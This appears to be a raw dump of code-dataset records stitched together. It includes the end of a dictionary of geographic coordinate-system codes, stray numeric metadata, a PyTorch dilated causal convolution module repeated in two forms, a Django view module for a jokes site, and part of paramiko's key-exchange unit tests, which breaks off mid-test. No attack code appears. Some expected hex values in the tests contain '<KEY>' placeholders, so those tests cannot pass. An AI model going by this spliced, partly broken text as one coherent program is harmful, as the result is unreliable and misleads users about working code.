'GCS_ISTS_061_1968': 37242, 'GCS_LC5_1961': 37243, 'GCS_Observ_Meteorologico_1939': 37245, 'GCS_Pico_de_Las_Nieves': 37246, 'GCS_Porto_Santo_1936': 37247, 'GCS_Sao_Braz': 37249, 'GCS_Selvagem_Grande_1938': 37250, 'GCS_Tristan_1968': 37251, 'GCS_American_Samoa_1962': 37252, 'GCS_Camp_Area': 37253, 'GCS_Deception_Island': 37254, 'GCS_Gunung_Segara': 37255, 'GCS_S42_Hungary': 37257, 'GCS_Kusaie_1951': 37259, 'GCS_Alaskan_Islands': 37260, 'GCS_Assumed_Geographic_1': 104000, 'GCS_Estonia_1937': 104101, 'GCS_Hermannskogel': 104102, 'GCS_Sierra_Leone_1960': 104103, 'GCS_Hong_Kong_1980': 104104, 'GCS_Datum_Lisboa_Bessel': 104105, 'GCS_Datum_Lisboa_Hayford': 104106, 'GCS_RGF_1993': 104107, 'GCS_NZGD_2000': 104108, 'GCS_Pohnpei': 104109, 'GCS_REGVEN': 104110, 'GCS_JGD_2000': 104111, 'GCS_Bab_South': 104112, 'GCS_Majuro': 104113, 'GCS_Bermuda_2000': 104114, 'GCS_ITRF_1988': 104115, 'GCS_ITRF_1989': 104116, 'GCS_ITRF_1990': 104117, 'GCS_ITRF_1991': 104118, 'GCS_ITRF_1992': 104119, 
'GCS_ITRF_1993': 104120, 'GCS_ITRF_1994': 104121, 'GCS_ITRF_1996': 104122, 'GCS_ITRF_1997': 104123, 'GCS_ITRF_2000': 104124, 'GCS_Chatham_Islands_1979': 104125, 'GCS_Observatorio_Meteorologico_1965': 104126, 'GCS_Roma_1940': 104127, 'GCS_Sphere_EMEP': 104128, 'GCS_EUREF_FIN': 104129, 'GCS_Jordan': 104130, 'GCS_D48': 104131, 'GCS_Ocotepeque_1935': 104132, 'GCS_JAD_2001': 104133, 'GCS_MONREF_1997': 104134, 'GCS_MSK_1942': 104135, 'GCS_TWD_1967': 104136, 'GCS_TWD_1997': 104137, 'GCS_WGS_1984_Major_Auxiliary_Sphere': 104199, 'GCS_ETRF_1989': 104258, 'GCS_Merchich_Degree': 104261, 'GCS_Voirol_1875_Degree': 104304, 'GCS_Voirol_Unifie_1960_Degree': 104305, 'GCS_NAD_1983_HARN_Adj_MN_Anoka': 104700, 'GCS_NAD_1983_HARN_Adj_MN_Becker': 104701, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_North': 104702, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_South': 104703, 'GCS_NAD_1983_HARN_Adj_MN_Benton': 104704, 'GCS_NAD_1983_HARN_Adj_MN_Big_Stone': 104705, 'GCS_NAD_1983_HARN_Adj_MN_Blue_Earth': 104706, 'GCS_NAD_1983_HARN_Adj_MN_Brown': 104707, 'GCS_NAD_1983_HARN_Adj_MN_Carlton': 104708, 'GCS_NAD_1983_HARN_Adj_MN_Carver': 104709, 'GCS_NAD_1983_HARN_Adj_MN_Cass_North': 104710, 'GCS_NAD_1983_HARN_Adj_MN_Cass_South': 104711, 'GCS_NAD_1983_HARN_Adj_MN_Chippewa': 104712, 'GCS_NAD_1983_HARN_Adj_MN_Chisago': 104713, 'GCS_NAD_1983_HARN_Adj_MN_Cook_North': 104714, 'GCS_NAD_1983_HARN_Adj_MN_Cook_South': 104715, 'GCS_NAD_1983_HARN_Adj_MN_Cottonwood': 104716, 'GCS_NAD_1983_HARN_Adj_MN_Crow_Wing': 104717, 'GCS_NAD_1983_HARN_Adj_MN_Dakota': 104718, 'GCS_NAD_1983_HARN_Adj_MN_Dodge': 104719, 'GCS_NAD_1983_HARN_Adj_MN_Douglas': 104720, 'GCS_NAD_1983_HARN_Adj_MN_Faribault': 104721, 'GCS_NAD_1983_HARN_Adj_MN_Fillmore': 104722, 'GCS_NAD_1983_HARN_Adj_MN_Freeborn': 104723, 'GCS_NAD_1983_HARN_Adj_MN_Goodhue': 104724, 'GCS_NAD_1983_HARN_Adj_MN_Grant': 104725, 'GCS_NAD_1983_HARN_Adj_MN_Hennepin': 104726, 'GCS_NAD_1983_HARN_Adj_MN_Houston': 104727, 'GCS_NAD_1983_HARN_Adj_MN_Isanti': 104728, 
'GCS_NAD_1983_HARN_Adj_MN_Itasca_North': 104729, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_South': 104730, 'GCS_NAD_1983_HARN_Adj_MN_Jackson': 104731, 'GCS_NAD_1983_HARN_Adj_MN_Kanabec': 104732, 'GCS_NAD_1983_HARN_Adj_MN_Kandiyohi': 104733, 'GCS_NAD_1983_HARN_Adj_MN_Kittson': 104734, 'GCS_NAD_1983_HARN_Adj_MN_Koochiching': 104735, 'GCS_NAD_1983_HARN_Adj_MN_Lac_Qui_Parle': 104736, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North': 104737, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South': 104738, 'GCS_NAD_1983_HARN_Adj_MN_Le_Sueur': 104739, 'GCS_NAD_1983_HARN_Adj_MN_Lincoln': 104740, 'GCS_NAD_1983_HARN_Adj_MN_Lyon': 104741, 'GCS_NAD_1983_HARN_Adj_MN_McLeod': 104742, 'GCS_NAD_1983_HARN_Adj_MN_Mahnomen': 104743, 'GCS_NAD_1983_HARN_Adj_MN_Marshall': 104744, 'GCS_NAD_1983_HARN_Adj_MN_Martin': 104745, 'GCS_NAD_1983_HARN_Adj_MN_Meeker': 104746, 'GCS_NAD_1983_HARN_Adj_MN_Morrison': 104747, 'GCS_NAD_1983_HARN_Adj_MN_Mower': 104748, 'GCS_NAD_1983_HARN_Adj_MN_Murray': 104749, 'GCS_NAD_1983_HARN_Adj_MN_Nicollet': 104750, 'GCS_NAD_1983_HARN_Adj_MN_Nobles': 104751, 'GCS_NAD_1983_HARN_Adj_MN_Norman': 104752, 'GCS_NAD_1983_HARN_Adj_MN_Olmsted': 104753, 'GCS_NAD_1983_HARN_Adj_MN_Ottertail': 104754, 'GCS_NAD_1983_HARN_Adj_MN_Pennington': 104755, 'GCS_NAD_1983_HARN_Adj_MN_Pine': 104756, 'GCS_NAD_1983_HARN_Adj_MN_Pipestone': 104757, 'GCS_NAD_1983_HARN_Adj_MN_Polk': 104758, 'GCS_NAD_1983_HARN_Adj_MN_Pope': 104759, 'GCS_NAD_1983_HARN_Adj_MN_Ramsey': 104760, 'GCS_NAD_1983_HARN_Adj_MN_Red_Lake': 104761, 'GCS_NAD_1983_HARN_Adj_MN_Redwood': 104762, 'GCS_NAD_1983_HARN_Adj_MN_Renville': 104763, 'GCS_NAD_1983_HARN_Adj_MN_Rice': 104764, 'GCS_NAD_1983_HARN_Adj_MN_Rock': 104765, 'GCS_NAD_1983_HARN_Adj_MN_Roseau': 104766, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_North': 104767, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_Central': 104768, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_South': 104769, 'GCS_NAD_1983_HARN_Adj_MN_Scott': 104770, 'GCS_NAD_1983_HARN_Adj_MN_Sherburne': 104771, 'GCS_NAD_1983_HARN_Adj_MN_Sibley': 104772, 
'GCS_NAD_1983_HARN_Adj_MN_Stearns': 104773, 'GCS_NAD_1983_HARN_Adj_MN_Steele': 104774, 'GCS_NAD_1983_HARN_Adj_MN_Stevens': 104775, 'GCS_NAD_1983_HARN_Adj_MN_Swift': 104776, 'GCS_NAD_1983_HARN_Adj_MN_Todd': 104777, 'GCS_NAD_1983_HARN_Adj_MN_Traverse': 104778, 'GCS_NAD_1983_HARN_Adj_MN_Wabasha': 104779, 'GCS_NAD_1983_HARN_Adj_MN_Wadena': 104780, 'GCS_NAD_1983_HARN_Adj_MN_Waseca': 104781, 'GCS_NAD_1983_HARN_Adj_MN_Watonwan': 104782, 'GCS_NAD_1983_HARN_Adj_MN_Winona': 104783, 'GCS_NAD_1983_HARN_Adj_MN_Wright': 104784, 'GCS_NAD_1983_HARN_Adj_MN_Yellow_Medicine': 104785, 'GCS_NAD_1983_HARN_Adj_WI_Adams': 104800, 'GCS_NAD_1983_HARN_Adj_WI_Ashland': 104801, 'GCS_NAD_1983_HARN_Adj_WI_Barron': 104802, 'GCS_NAD_1983_HARN_Adj_WI_Bayfield': 104803, 'GCS_NAD_1983_HARN_Adj_WI_Brown': 104804, 'GCS_NAD_1983_HARN_Adj_WI_Buffalo': 104805, 'GCS_NAD_1983_HARN_Adj_WI_Burnett': 104806, 'GCS_NAD_1983_HARN_Adj_WI_Calumet': 104807, 'GCS_NAD_1983_HARN_Adj_WI_Chippewa': 104808, 'GCS_NAD_1983_HARN_Adj_WI_Clark': 104809, 'GCS_NAD_1983_HARN_Adj_WI_Columbia': 104810, 'GCS_NAD_1983_HARN_Adj_WI_Crawford': 104811, 'GCS_NAD_1983_HARN_Adj_WI_Dane': 104812, 'GCS_NAD_1983_HARN_Adj_WI_Dodge': 104813, 'GCS_NAD_1983_HARN_Adj_WI_Door': 104814, 'GCS_NAD_1983_HARN_Adj_WI_Douglas': 104815, 'GCS_NAD_1983_HARN_Adj_WI_Dunn': 104816, 'GCS_NAD_1983_HARN_Adj_WI_EauClaire': 104817, 'GCS_NAD_1983_HARN_Adj_WI_Florence': 104818, 'GCS_NAD_1983_HARN_Adj_WI_FondduLac': 104819, 'GCS_NAD_1983_HARN_Adj_WI_Forest': 104820, 'GCS_NAD_1983_HARN_Adj_WI_Grant': 104821, 'GCS_NAD_1983_HARN_Adj_WI_Green': 104822, 'GCS_NAD_1983_HARN_Adj_WI_GreenLake': 104823, 'GCS_NAD_1983_HARN_Adj_WI_Iowa': 104824, 'GCS_NAD_1983_HARN_Adj_WI_Iron': 104825, 'GCS_NAD_1983_HARN_Adj_WI_Jackson': 104826, 'GCS_NAD_1983_HARN_Adj_WI_Jefferson': 104827, 'GCS_NAD_1983_HARN_Adj_WI_Juneau': 104828, 'GCS_NAD_1983_HARN_Adj_WI_Kenosha': 104829, 'GCS_NAD_1983_HARN_Adj_WI_Kewaunee': 104830, 'GCS_NAD_1983_HARN_Adj_WI_LaCrosse': 104831, 
'GCS_NAD_1983_HARN_Adj_WI_Lafayette': 104832, 'GCS_NAD_1983_HARN_Adj_WI_Langlade': 104833, 'GCS_NAD_1983_HARN_Adj_WI_Lincoln': 104834, 'GCS_NAD_1983_HARN_Adj_WI_Manitowoc': 104835, 'GCS_NAD_1983_HARN_Adj_WI_Marathon': 104836, 'GCS_NAD_1983_HARN_Adj_WI_Marinette': 104837, 'GCS_NAD_1983_HARN_Adj_WI_Marquette': 104838, 'GCS_NAD_1983_HARN_Adj_WI_Menominee': 104839, 'GCS_NAD_1983_HARN_Adj_WI_Milwaukee': 104840, 'GCS_NAD_1983_HARN_Adj_WI_Monroe': 104841, 'GCS_NAD_1983_HARN_Adj_WI_Oconto': 104842, 'GCS_NAD_1983_HARN_Adj_WI_Oneida': 104843, 'GCS_NAD_1983_HARN_Adj_WI_Outagamie': 104844, 'GCS_NAD_1983_HARN_Adj_WI_Ozaukee': 104845, 'GCS_NAD_1983_HARN_Adj_WI_Pepin': 104846, 'GCS_NAD_1983_HARN_Adj_WI_Pierce': 104847, 'GCS_NAD_1983_HARN_Adj_WI_Polk': 104848, 'GCS_NAD_1983_HARN_Adj_WI_Portage': 104849, 'GCS_NAD_1983_HARN_Adj_WI_Price': 104850, 'GCS_NAD_1983_HARN_Adj_WI_Racine': 104851, 'GCS_NAD_1983_HARN_Adj_WI_Richland': 104852, 'GCS_NAD_1983_HARN_Adj_WI_Rock': 104853, 'GCS_NAD_1983_HARN_Adj_WI_Rusk': 104854, 'GCS_NAD_1983_HARN_Adj_WI_StCroix': 104855, 'GCS_NAD_1983_HARN_Adj_WI_Sauk': 104856, 'GCS_NAD_1983_HARN_Adj_WI_Sawyer': 104857, 'GCS_NAD_1983_HARN_Adj_WI_Shawano': 104858, 'GCS_NAD_1983_HARN_Adj_WI_Sheboygan': 104859, 'GCS_NAD_1983_HARN_Adj_WI_Taylor': 104860, 'GCS_NAD_1983_HARN_Adj_WI_Trempealeau': 104861, 'GCS_NAD_1983_HARN_Adj_WI_Vernon': 104862, 'GCS_NAD_1983_HARN_Adj_WI_Vilas': 104863, 'GCS_NAD_1983_HARN_Adj_WI_Walworth': 104864, 'GCS_NAD_1983_HARN_Adj_WI_Washburn': 104865, 'GCS_NAD_1983_HARN_Adj_WI_Washington': 104866, 'GCS_NAD_1983_HARN_Adj_WI_Waukesha': 104867, 'GCS_NAD_1983_HARN_Adj_WI_Waupaca': 104868, 'GCS_NAD_1983_HARN_Adj_WI_Waushara': 104869, 'GCS_NAD_1983_HARN_Adj_WI_Winnebago': 104870, 'GCS_NAD_1983_HARN_Adj_WI_Wood': 104871, 'GCS_Mercury_2000': 104900, 'GCS_Venus_1985': 104901, 'GCS_Venus_2000': 104902, 'GCS_Moon_2000': 104903, 'GCS_Mars_1979': 104904, 'GCS_Mars_2000': 104905, 'GCS_Deimos_2000': 104906, 'GCS_Phobos_2000': 104907, 'GCS_Jupiter_2000': 104908, 
'GCS_Adrastea_2000': 104909, 'GCS_Amalthea_2000': 104910, 'GCS_Ananke_2000': 104911, 'GCS_Callisto_2000': 104912, 'GCS_Carme_2000': 104913, 'GCS_Elara_2000': 104914, 'GCS_Europa_2000': 104915, 'GCS_Ganymede_2000': 104916, 'GCS_Himalia_2000': 104917, 'GCS_Io_2000': 104918, 'GCS_Leda_2000': 104919, 'GCS_Lysithea_2000': 104920, 'GCS_Metis_2000': 104921, 'GCS_Pasiphae_2000': 104922, 'GCS_Sinope_2000': 104923, 'GCS_Thebe_2000': 104924, 'GCS_Saturn_2000': 104925, 'GCS_Atlas_2000': 104926, 'GCS_Calypso_2000': 104927, 'GCS_Dione_2000': 104928, 'GCS_Enceladus_2000': 104929, 'GCS_Epimetheus_2000': 104930, 'GCS_Helene_2000': 104931, 'GCS_Hyperion_2000': 104932, 'GCS_Iapetus_2000': 104933, 'GCS_Janus_2000': 104934, 'GCS_Mimas_2000': 104935, 'GCS_Pan_2000': 104936, 'GCS_Pandora_2000': 104937, 'GCS_Phoebe_2000': 104938, 'GCS_Prometheus_2000': 104939, 'GCS_Rhea_2000': 104940, 'GCS_Telesto_2000': 104941, 'GCS_Tethys_2000': 104942, 'GCS_Titan_2000': 104943, 'GCS_Uranus_2000': 104944, 'GCS_Ariel_2000': 104945, 'GCS_Belinda_2000': 104946, 'GCS_Bianca_2000': 104947, 'GCS_Cordelia_2000': 104948, 'GCS_Cressida_2000': 104949, 'GCS_Desdemona_2000': 104950, 'GCS_Juliet_2000': 104951, 'GCS_Miranda_2000': 104952, 'GCS_Oberon_2000': 104953, 'GCS_Ophelia_2000': 104954, 'GCS_Portia_2000': 104955, 'GCS_Puck_2000': 104956, 'GCS_Rosalind_2000': 104957, 'GCS_Titania_2000': 104958, 'GCS_Umbriel_2000': 104959, 'GCS_Neptune_2000': 104960, 'GCS_Despina_2000': 104961, 'GCS_Galatea_2000': 104962, 'GCS_Larissa_2000': 104963, 'GCS_Naiad_2000': 104964, 'GCS_Nereid_2000': 104965, 'GCS_Proteus_2000': 104966, 'GCS_Thalassa_2000': 104967, 'GCS_Triton_2000': 104968, 'GCS_Pluto_2000': 104969, 'GCS_Charon_2000': 104970 } geographic = geographic() projected = projected()
none
1
3.147694
3
neural_sp/models/modules/causal_conv.py
ishine/neural_sp
577
6627883
# Copyright 2020 Kyoto University (<NAME>)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

"""Dilated causal convolution."""

import logging

import torch.nn as nn

from neural_sp.models.modules.initialization import init_with_lecun_normal
from neural_sp.models.modules.initialization import init_with_xavier_uniform

logger = logging.getLogger(__name__)


class CausalConv1d(nn.Module):
    """1D dilated causal convolution.

    Causality is obtained by left-padding the input with
    ``(kernel_size - 1) * dilation`` frames (via symmetric ``nn.Conv1d``
    padding) and trimming the same number of frames from the right of the
    convolution output, so position ``t`` never sees inputs later than ``t``.

    Args:
        in_channels (int): input channel size
        out_channels (int): output channel size
        kernel_size (int): kernel size
        dilation (int): dilation rate
        groups (int): number of blocked connections from input channels to output channels
        param_init (str): parameter initialization method ('xavier_uniform', 'lecun', or '' to skip)

    """

    def __init__(self, in_channels, out_channels, kernel_size, dilation=1,
                 groups=1, param_init=''):
        super().__init__()
        # Amount of left context required so that output at time t depends
        # only on inputs at times <= t.
        self.padding = (kernel_size - 1) * dilation
        self.conv1d = nn.Conv1d(in_channels, out_channels, kernel_size,
                                padding=self.padding,
                                dilation=dilation,
                                groups=groups)

        if param_init == 'xavier_uniform':
            self.reset_parameters_xavier_uniform()
        elif param_init == 'lecun':
            self.reset_parameters_lecun()
        else:
            logger.info('Parameter initialization is skipped.')

    def reset_parameters_xavier_uniform(self):
        """Initialize parameters with Xavier uniform distribution."""
        logger.info('===== Initialize %s with Xavier uniform distribution =====' %
                    self.__class__.__name__)
        for n, p in self.named_parameters():
            init_with_xavier_uniform(n, p)

    def reset_parameters_lecun(self, param_init=0.1):
        """Initialize parameters with lecun style."""
        logger.info('===== Initialize %s with lecun style =====' %
                    self.__class__.__name__)
        for n, p in self.named_parameters():
            init_with_lecun_normal(n, p, param_init)

    def forward(self, xs):
        """Forward pass.

        Args:
            xs (FloatTensor): `[B, T, C_in]`
        Returns:
            xs (FloatTensor): `[B, T, C_out]`

        """
        xs = xs.transpose(2, 1)  # `[B, C_in, T]` layout expected by nn.Conv1d
        xs = self.conv1d(xs)
        if self.padding != 0:
            # nn.Conv1d pads both sides; drop the right-side frames so the
            # convolution stays causal and the output length equals T.
            xs = xs[:, :, :-self.padding]
        xs = xs.transpose(2, 1).contiguous()  # back to `[B, T, C_out]`
        return xs
# Copyright 2020 Kyoto University (<NAME>) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) """Dilated causal convolution.""" import logging import torch.nn as nn from neural_sp.models.modules.initialization import init_with_lecun_normal from neural_sp.models.modules.initialization import init_with_xavier_uniform logger = logging.getLogger(__name__) class CausalConv1d(nn.Module): """1D dilated causal convolution. Args: in_channels (int): input channel size out_channels (int): output channel size kernel_size (int): kernel size dilation (int): deletion rate param_init (str): parameter initialization method """ def __init__(self, in_channels, out_channels, kernel_size, dilation=1, groups=1, param_init=''): super().__init__() self.padding = (kernel_size - 1) * dilation self.conv1d = nn.Conv1d(in_channels, out_channels, kernel_size, padding=self.padding, dilation=dilation, groups=groups) if param_init == 'xavier_uniform': self.reset_parameters_xavier_uniform() elif param_init == 'lecun': self.reset_parameters_lecun() else: logger.info('Parameter initialization is skipped.') def reset_parameters_xavier_uniform(self): """Initialize parameters with Xavier uniform distribution.""" logger.info('===== Initialize %s with Xavier uniform distribution =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_xavier_uniform(n, p) def reset_parameters_lecun(self, param_init=0.1): """Initialize parameters with lecun style..""" logger.info('===== Initialize %s with lecun style =====' % self.__class__.__name__) for n, p in self.named_parameters(): init_with_lecun_normal(n, p, param_init) def forward(self, xs): """Forward pass. Args: xs (FloatTensor): `[B, T, C_in]` Returns: xs (FloatTensor): `[B, T, C_out]` """ xs = xs.transpose(2, 1) xs = self.conv1d(xs) if self.padding != 0: xs = xs[:, :, :-self.padding] xs = xs.transpose(2, 1).contiguous() return xs
en
0.484195
# Copyright 2020 Kyoto University (<NAME>) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) Dilated causal convolution. 1D dilated causal convolution. Args: in_channels (int): input channel size out_channels (int): output channel size kernel_size (int): kernel size dilation (int): dilation rate param_init (str): parameter initialization method Initialize parameters with Xavier uniform distribution. Initialize parameters with lecun style. Forward pass. Args: xs (FloatTensor): `[B, T, C_in]` Returns: xs (FloatTensor): `[B, T, C_out]`
2.217309
2
autorski/extras/prepare_view.py
jchmura/suchary-django
0
6627884
from functools import reduce
import operator

from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db.models import Q

from autorski.models import Joke


def __add_pages(request, jokes):
    """Paginate *jokes* (15 per page) according to the ``page`` GET parameter."""
    paginator = Paginator(jokes, 15)
    page = request.GET.get('page')
    try:
        jokes = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        jokes = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999), deliver last page of results.
        jokes = paginator.page(paginator.num_pages)
    return jokes


def __add_user(request, context):
    """Add the current user's display name, username and moderator flag to *context*.

    Anonymous users get ``None`` for both name fields.
    """
    user = request.user
    if user.is_authenticated():
        if user.first_name:
            name = user.first_name
            if user.last_name:
                name += ' ' + user.last_name
        else:
            name = user.username
        username = user.username
    else:
        name = None
        username = None
    context.update({'user_fullname': name, 'username': username})
    # Moderator status is derived solely from membership in the 'Moderator' group.
    moderator = bool(user.groups.filter(name='Moderator'))
    context.update({'moderator': moderator})


def all_jokes(request, pages=True):
    """Build a template context of all jokes, optionally filtered, sorted and paginated.

    GET parameters:
        sort: Joke attribute to sort by (default ``'date'``).
        reversed: ``'true'`` yields ascending order; any other value descending.
        q: whitespace-separated terms that must all occur in the joke body.
        page: page number (used only when *pages* is True).
    """
    sort = request.GET.get('sort', 'date')
    reverse = request.GET.get('reversed', True)
    # NOTE(review): this mapping looks inverted -- ``reversed=true`` produces
    # ascending order while any other value produces descending order.
    # Behavior is preserved here; confirm intent before changing, since
    # templates/links may rely on it.
    if reverse != 'true':
        reverse = True
    else:
        reverse = False

    context = {}
    jokes = Joke.objects.all()

    search = request.GET.get('q', '')
    if search.strip() != '':
        items = search.split()
        # AND together one case-insensitive body filter per search term.
        query = reduce(operator.and_, (Q(body__icontains=x) for x in items))
        jokes = jokes.filter(query)
        context.update({'search': search})

    jokes = sorted(jokes, key=lambda joke: getattr(joke, sort), reverse=reverse)
    if pages:
        jokes = __add_pages(request, jokes)

    context.update({'jokes': jokes})
    __add_user(request, context)
    return context


def one_joke(request, id):
    """Build a template context for the single joke with primary key *id*."""
    joke = Joke.objects.get(pk=id)
    context = {'joke': joke}
    __add_user(request, context)
    return context
from functools import reduce import operator from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.db.models import Q from autorski.models import Joke def __add_pages(request, jokes): paginator = Paginator(jokes, 15) page = request.GET.get('page') try: jokes = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. jokes = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. jokes = paginator.page(paginator.num_pages) return jokes def __add_user(request, context): user = request.user if user.is_authenticated(): if user.first_name: name = user.first_name if user.last_name: name += ' ' + user.last_name else: name = user.username username = user.username else: name = None username = None context.update({'user_fullname': name, 'username': username}) moderator = True if user.groups.filter(name='Moderator') else False context.update({'moderator': moderator}) def all_jokes(request, pages=True): sort = request.GET.get('sort', 'date') reverse = request.GET.get('reversed', True) if reverse != 'true': reverse = True else: reverse = False context = {} jokes = Joke.objects.all() search = request.GET.get('q', '') if search.strip() != '': items = search.split() filter = reduce(operator.and_, (Q(body__icontains=x) for x in items)) jokes = jokes.filter(filter) context.update({'search': search}) jokes = sorted(jokes, key=lambda joke: joke.__getattribute__(sort), reverse=reverse) if pages: jokes = __add_pages(request, jokes) context.update({'jokes': jokes}) __add_user(request, context) return context def one_joke(request, id): joke = Joke.objects.get(pk=id) context = {'joke': joke} __add_user(request, context) return context
en
0.67353
# If page is not an integer, deliver first page. # If page is out of range (e.g. 9999), deliver last page of results.
2.34975
2
src/paramiko-master/tests/test_kex.py
zhanggen3714/zhanggen_audit
1
6627885
<reponame>zhanggen3714/zhanggen_audit # Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. """ Some unit tests for the key exchange protocols. """ from binascii import hexlify, unhexlify import os import unittest from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import ec import paramiko.util from paramiko.kex_group1 import KexGroup1 from paramiko.kex_gex import KexGex, KexGexSHA256 from paramiko import Message from paramiko.common import byte_chr from paramiko.kex_ecdh_nist import KexNistp256 def dummy_urandom(n): return byte_chr(0xcc) * n def dummy_generate_key_pair(obj): private_key_value = ( 94761803665136558137557783047955027733968423115106677159790289642479432803037 ) public_key_numbers = ( "<KEY>" ) public_key_numbers_obj = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ) obj.P = ec.EllipticCurvePrivateNumbers( private_value=private_key_value, public_numbers=public_key_numbers_obj ).private_key(default_backend()) if obj.transport.server_mode: obj.Q_S = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) return obj.Q_C = 
ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) class FakeKey(object): def __str__(self): return "fake-key" def asbytes(self): return b"fake-key" def sign_ssh_data(self, H): return b"fake-sig" class FakeModulusPack(object): P = ( 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF ) G = 2 def get_modulus(self, min, ask, max): return self.G, self.P class FakeTransport(object): local_version = "SSH-2.0-paramiko_1.0" remote_version = "SSH-2.0-lame" local_kex_init = "local-kex-init" remote_kex_init = "remote-kex-init" def _send_message(self, m): self._message = m def _expect_packet(self, *t): self._expect = t def _set_K_H(self, K, H): self._K = K self._H = H def _verify_key(self, host_key, sig): self._verify = (host_key, sig) def _activate_outbound(self): self._activated = True def _log(self, level, s): pass def get_server_key(self): return FakeKey() def _get_modulus_pack(self): return FakeModulusPack() class KexTest(unittest.TestCase): K = ( 14730343317708716439807310032871972459448364195094179797249681733965528989482751523943515690110179031004049109375612685505881911274101441415545039654102474376472240501616988799699744135291070488314748284283496055223852115360852283821334858541043710301057312858051901453919067023103730011648890038847384890504 ) def setUp(self): self._original_urandom = os.urandom os.urandom = dummy_urandom self._original_generate_key_pair = KexNistp256._generate_key_pair KexNistp256._generate_key_pair = dummy_generate_key_pair def tearDown(self): os.urandom = self._original_urandom KexNistp256._generate_key_pair = self._original_generate_key_pair def test_1_group1_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGroup1(transport) 
kex.start_kex() x = ( b"1E000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_REPLY,), transport._expect ) # fake "reply" msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_REPLY, msg) H = b"03079780F3D3AD0B3C6DB30C8D21685F367A86D2" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_2_group1_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGroup1(transport) kex.start_kex() self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_INIT,), transport._expect ) msg = Message() msg.add_mpint(69) msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_INIT, msg) H = b"B16BF34DD10945EDE84E9C1EF24A14BFDC843389" x = ( b"1F0000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB<KEY>8D40000000866616B652D736967" ) self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_3_gex_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) 
